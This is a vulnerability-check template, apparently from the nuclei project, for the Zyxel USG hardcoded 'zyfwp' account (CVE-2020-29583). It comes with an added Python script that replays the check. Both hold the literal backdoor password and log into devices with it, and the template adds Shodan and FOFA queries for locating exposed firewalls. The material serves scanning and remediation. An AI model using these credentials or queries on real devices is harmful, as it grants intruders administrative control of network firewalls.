id: CVE-2020-29583

info:
  name: ZyXel USG - Hardcoded Credentials
  author: canberbamber
  severity: critical
  description: |
    A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to the affected device, potentially leading to further compromise of the network.
  remediation: |
    Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue.
  reference:
    - https://www.zyxel.com/support/CVE-2020-29583.shtml
    - https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29583
    - https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
    - http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29583
    cwe-id: CWE-522
    epss-score: 0.96125
    epss-percentile: 0.995
    cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: zyxel
    product: usg20-vpn_firmware
    shodan-query:
      - title:"USG FLEX 100"
      - http.title:"usg flex 100"
    fofa-query: title="usg flex 100"
    google-query: intitle:"usg flex 100"
  tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev

http:
  - raw:
      - |
        GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /ext-js/index.html HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - 'data-qtip="Web Console'
          - 'CLI'
          - 'Configuration">'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a2ae062963e47e20957961aa77ace4d8bbafe9d75ab5f5ba8826088301781c3e022042377ff48be52c3086bef886dfb07d60d720f2969a1452672f62af68c456957d:922c64590222798bb761d5b6d8e72950
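The two-request check above, rewritten as a stand-alone Python script so the matcher semantics are explicit: request 1 presents the `zyfwp` credentials from the template, request 2 fetches `/ext-js/index.html`, and the device is only reported as matched when that second response is HTTP 200 and contains all three admin-UI markers (`condition: and`). This is an added example, not code from the nuclei-templates project or from Zyxel. It assumes that the session established by the first request is carried to the second by a cookie (nuclei reuses cookies between raw requests by default; that is what `part: body_2` relies on), that the device uses a self-signed certificate, and the placeholder target address and User-Agent string are mine. The sample HTML body used for offline testing is constructed, not captured from a device.

```python
"""Stand-alone replay of the CVE-2020-29583 nuclei check (added example, not project code)."""
import http.cookiejar
import ssl
import sys
import urllib.error
import urllib.parse
import urllib.request

# Credentials exactly as they appear in the template's first raw request.
ZYFWP_USER = "zyfwp"
ZYFWP_PASS = "PrOw!aN_fXp"

# Markers the template's word matcher requires in the second response body;
# every one of them must be present (condition: and).
ADMIN_UI_MARKERS = ('data-qtip="Web Console', "CLI", 'Configuration">')


def login_url(base_url: str) -> str:
    """Build request 1: GET /?username=zyfwp&password=... on the given base URL."""
    query = urllib.parse.urlencode(
        {"username": ZYFWP_USER, "password": ZYFWP_PASS}, safe="!"
    )  # safe="!" keeps the password byte-for-byte as the template sends it
    return base_url.rstrip("/") + "/?" + query


def matches(status: int, body: str) -> bool:
    """Matcher semantics from the template: status 200 AND all markers in body_2."""
    return status == 200 and all(marker in body for marker in ADMIN_UI_MARKERS)


def _opener() -> urllib.request.OpenerDirector:
    """Cookie-carrying opener that tolerates the device's self-signed certificate (assumption)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar()),
        urllib.request.HTTPSHandler(context=ctx),
    )


def fetch(opener, url: str, timeout: float):
    """GET url and return (status, decoded body), also for non-2xx responses."""
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2020-29583-check"})  # assumed UA
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def probe(base_url: str, timeout: float = 10.0) -> bool:
    """Replay the template: log in as zyfwp, then fetch /ext-js/index.html in the
    same cookie session and apply the matcher to that second response only."""
    opener = _opener()
    fetch(opener, login_url(base_url), timeout)  # request 1: response body is not inspected
    status, body = fetch(opener, base_url.rstrip("/") + "/ext-js/index.html", timeout)  # request 2
    return matches(status, body)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "https://192.0.2.1"  # placeholder target
    print("matched (zyfwp session reached the admin UI)" if probe(target) else "not matched")
```

Run it as `python3 check.py https://<device>` against a host you are authorised to test. A 200 on `/ext-js/index.html` alone is not enough: an unauthenticated device may serve that page with a login prompt, which is why the template ANDs the status with the three UI markers that only appear once a session is established.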